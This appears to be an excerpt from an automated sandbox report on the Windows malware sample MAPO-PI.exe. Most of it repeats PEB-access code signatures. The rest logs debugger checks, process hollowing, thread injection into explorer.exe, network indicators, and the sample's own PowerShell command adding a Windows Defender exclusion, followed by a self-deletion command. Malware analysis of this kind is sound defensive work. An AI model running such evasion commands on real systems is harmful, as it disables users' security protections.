Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196070D mov eax, dword ptr fs:[00000030h] 3_2_0196070D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BF716 mov eax, dword ptr fs:[00000030h] 3_2_018BF716
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h] 3_2_01894F2E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h] 3_2_01894F2E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h] 3_2_018BB73D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h] 3_2_018BB73D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CE730 mov eax, dword ptr fs:[00000030h] 3_2_018CE730
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AEF40 mov eax, dword ptr fs:[00000030h] 3_2_018AEF40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AFF60 mov eax, dword ptr fs:[00000030h] 3_2_018AFF60
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968F6A mov eax, dword ptr fs:[00000030h] 3_2_01968F6A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192FE87 mov eax, dword ptr fs:[00000030h] 3_2_0192FE87
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h] 3_2_01960EA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h] 3_2_01960EA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h] 3_2_01960EA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019146A7 mov eax, dword ptr fs:[00000030h] 3_2_019146A7
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968ED6 mov eax, dword ptr fs:[00000030h] 3_2_01968ED6
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C36CC mov eax, dword ptr fs:[00000030h] 3_2_018C36CC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D8EC7 mov eax, dword ptr fs:[00000030h] 3_2_018D8EC7
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194FEC0 mov eax, dword ptr fs:[00000030h] 3_2_0194FEC0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A76E2 mov eax, dword ptr fs:[00000030h] 3_2_018A76E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C16E0 mov ecx, dword ptr fs:[00000030h] 3_2_018C16E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h] 3_2_0189C600
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h] 3_2_0189C600
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h] 3_2_0189C600
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C8E00 mov eax, dword ptr fs:[00000030h] 3_2_018C8E00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h] 3_2_018CA61C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h] 3_2_018CA61C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951608 mov eax, dword ptr fs:[00000030h] 3_2_01951608
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189E620 mov eax, dword ptr fs:[00000030h] 3_2_0189E620
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194FE3F mov eax, dword ptr fs:[00000030h] 3_2_0194FE3F
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h] 3_2_018A7E41
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h] 3_2_0195AE44
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h] 3_2_0195AE44
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A766D mov eax, dword ptr fs:[00000030h] 3_2_018A766D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h] 3_2_018BAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38CD6 mov eax, dword ptr fs:[00000030h] 16_2_04D38CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D214FB mov eax, dword ptr fs:[00000030h] 16_2_04D214FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h] 16_2_04CE6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h] 16_2_04CE6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h] 16_2_04CE6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7849B mov eax, dword ptr fs:[00000030h] 16_2_04C7849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9A44B mov eax, dword ptr fs:[00000030h] 16_2_04C9A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h] 16_2_04CFC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h] 16_2_04CFC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8746D mov eax, dword ptr fs:[00000030h] 16_2_04C8746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h] 16_2_04CE6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] 16_2_04D21C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h] 16_2_04D3740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h] 16_2_04D3740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h] 16_2_04D3740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9BC2C mov eax, dword ptr fs:[00000030h] 16_2_04C9BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov ecx, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] 16_2_04CE6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D18DF1 mov eax, dword ptr fs:[00000030h] 16_2_04D18DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h] 16_2_04C7D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h] 16_2_04C7D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] 16_2_04D2FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] 16_2_04C62D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h] 16_2_04C9FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h] 16_2_04C9FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C935A1 mov eax, dword ptr fs:[00000030h] 16_2_04C935A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h] 16_2_04C91DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h] 16_2_04C91DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h] 16_2_04C91DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h] 16_2_04D305AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h] 16_2_04D305AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA3D43 mov eax, dword ptr fs:[00000030h] 16_2_04CA3D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE3540 mov eax, dword ptr fs:[00000030h] 16_2_04CE3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D13D40 mov eax, dword ptr fs:[00000030h] 16_2_04D13D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C87D50 mov eax, dword ptr fs:[00000030h] 16_2_04C87D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h] 16_2_04C8C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h] 16_2_04C8C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38D34 mov eax, dword ptr fs:[00000030h] 16_2_04D38D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2E539 mov eax, dword ptr fs:[00000030h] 16_2_04D2E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h] 16_2_04C94D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h] 16_2_04C94D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h] 16_2_04C94D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] 16_2_04C73D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6AD30 mov eax, dword ptr fs:[00000030h] 16_2_04C6AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CEA537 mov eax, dword ptr fs:[00000030h] 16_2_04CEA537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38ED6 mov eax, dword ptr fs:[00000030h] 16_2_04D38ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C936CC mov eax, dword ptr fs:[00000030h] 16_2_04C936CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA8EC7 mov eax, dword ptr fs:[00000030h] 16_2_04CA8EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FEC0 mov eax, dword ptr fs:[00000030h] 16_2_04D1FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C776E2 mov eax, dword ptr fs:[00000030h] 16_2_04C776E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C916E0 mov ecx, dword ptr fs:[00000030h] 16_2_04C916E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CFFE87 mov eax, dword ptr fs:[00000030h] 16_2_04CFFE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE46A7 mov eax, dword ptr fs:[00000030h] 16_2_04CE46A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h] 16_2_04D30EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h] 16_2_04D30EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h] 16_2_04D30EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] 16_2_04C77E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h] 16_2_04D2AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h] 16_2_04D2AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7766D mov eax, dword ptr fs:[00000030h] 16_2_04C7766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] 16_2_04C8AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h] 16_2_04C6C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h] 16_2_04C6C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h] 16_2_04C6C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C98E00 mov eax, dword ptr fs:[00000030h] 16_2_04C98E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h] 16_2_04C9A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h] 16_2_04C9A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21608 mov eax, dword ptr fs:[00000030h] 16_2_04D21608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6E620 mov eax, dword ptr fs:[00000030h] 16_2_04C6E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FE3F mov eax, dword ptr fs:[00000030h] 16_2_04D1FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA37F5 mov eax, dword ptr fs:[00000030h] 16_2_04CA37F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C78794 mov eax, dword ptr fs:[00000030h] 16_2_04C78794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h] 16_2_04CE7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h] 16_2_04CE7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h] 16_2_04CE7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7EF40 mov eax, dword ptr fs:[00000030h] 16_2_04C7EF40
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\MAPO-PI.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0040ACC0 LdrLoadDll, 3_2_0040ACC0
Source: C:\Users\user\Desktop\MAPO-PI.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 159.65.10.143 80
Source: C:\Windows\explorer.exe Domain query: www.lifeinformpodcast.com
Source: C:\Windows\explorer.exe Domain query: www.transforming-leadership.com
Source: C:\Windows\explorer.exe Domain query: www.diofis.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 109.232.217.55 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\MAPO-PI.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 8B0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3472
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000004.00000000.240240784.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Users\user\Desktop\MAPO-PI.exe VolumeInformation
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
